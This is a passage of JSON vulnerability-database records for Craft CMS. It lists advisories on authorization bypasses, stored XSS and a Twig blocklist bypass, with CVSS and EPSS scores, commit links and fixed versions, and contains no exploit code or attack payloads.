/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54ec85f19859d3300f70"},{"reference_url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264"},{"reference_url":"https://github.com/advisories/GHSA-4484-8v2f-5748","reference_id":"GHSA-4484-8v2f-5748","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32264","GHSA-4484-8v2f-5748"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rzq4-h1ms-nqef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91774?format=json","vulnerability_id":"VCID-sa99-8awj-eycd","summary":"Craft CMS: Authorized asset \"preview file\" requests bypass allows users without asset access to retrieve private preview metadata\n### Summary\n\nAn authenticated low-privileged user can call `assets/preview-file` for an asset they are not authorized to view and still receive preview response data (`previewHtml`) for that private asset.\n\nThe returned preview HTML included a private preview image route containing the target private `assetId`, even though `canView` was `false` for the attacker account.\n\n### Details\n\n1. `assets/preview-file` accepts a maliciously controlled `assetId` and renders preview output.\n2. The action does not enforce per-asset view authorization prior to returning preview content.\n 3. As a result, an authenticated user without asset-view permission can still obtain private preview output.\n\nThis affects Craft installations with authenticated users of mixed privilege levels with private assets.\n\n### Resources\n\n- d30df3112220db1ffd6726a3ed11857014c7fb27\n- b1cddf72c98a","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq"},{"reference_url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq","reference_id":"GHSA-44px-qjjc-xrhq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["GHSA-44px-qjjc-xrhq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sa99-8awj-eycd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50073?format=json","vulnerability_id":"VCID-twuy-wzb7-k7g3","summary":"Craft CMS Vulnerable to Stored XSS in Number Prefix & Suffix Fields\nA stored XSS vulnerability exists in the Number field type settings. The Prefix and Suffix fields are rendered using the `|md|raw` Twig filter without proper escaping, allowing script execution when the Number field is displayed on users' profiles.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06648","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496","reference_id":"CVE-2026-25496","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496"},{"reference_url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25496","GHSA-9f5h-mmq6-2x78"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twuy-wzb7-k7g3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91375?format=json","vulnerability_id":"VCID-tzjk-x116-ayge","summary":"Craft CMS: Low-privilege users could read private asset contents when editing an asset (IDOR)\n### Summary\n\nA low-privileged authenticated user can read private asset content by calling `assets/edit-image` with an arbitrary `assetId` that they are not authorized to view.\n\nThe endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files.\n\n### Details\n\nRoot cause:\n  - A user-controlled object reference (`assetId`) is used to load and return sensitive content.\n  - The action does not verify whether the current user is authorized to view that asset.\n  - This creates an authenticated IDOR / authorization bypass.\n\n### Impact\n\n- Craft installations where private/non-public assets exist and low-privileged users can authenticate.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0389","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158"},{"reference_url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"GHSA-3pvf-vxrv-hh9c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33158","GHSA-3pvf-vxrv-hh9c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tzjk-x116-ayge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50545?format=json","vulnerability_id":"VCID-vasz-rnn1-67ev","summary":"Craft CMS has Twig Function Blocklist Bypass\nCraft CMS implements a blocklist to prevent potentially dangerous PHP functions from being called via Twig non-Closure arrow functions.\n\nIn order to be able to successfully execute this attack, you need to either have `allowAdminChanges` enabled on production, or a compromised admin account, or an account with access to the System Messages utility.\n\nSeveral PHP functions are not included in the blocklist, which could allow malicious actors with the required permissions to execute various types of payloads, including RCEs, arbitrary file reads, SSRFs, and SSTIs.\n\nTwig has already deprecated this behavior, and it will eventually be removed from Twig altogether.\n\nhttps://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096\n\nThis has been resolved in Craft 4.17.0 and 5.9.0, which removes the blocklist and disables all non-Clousure arrow functions in Twig globally via the `enableTwigSandbox` config setting. That setting is enabled by default on all new Craft projects. Existing Craft projects will need to enable the config setting to take advantage of it.\n\nExisting projects should update to the patched versions of 5.9.0 and 4.17.0 to mitigate the issue and enable the config setting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11182","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783","reference_id":"CVE-2026-28783","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783"},{"reference_url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28783","GHSA-5fvc-7894-ghp4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vasz-rnn1-67ev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50074?format=json","vulnerability_id":"VCID-vvhc-rnpr-ubey","summary":"Craft CMS Vulnerable to Stored XSS in Entry Types Name\nStored XSS via Entry Type names. The name is not sanitized when displayed in the Entry Types list.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25491","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05719","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25491"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25491","reference_id":"CVE-2026-25491","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/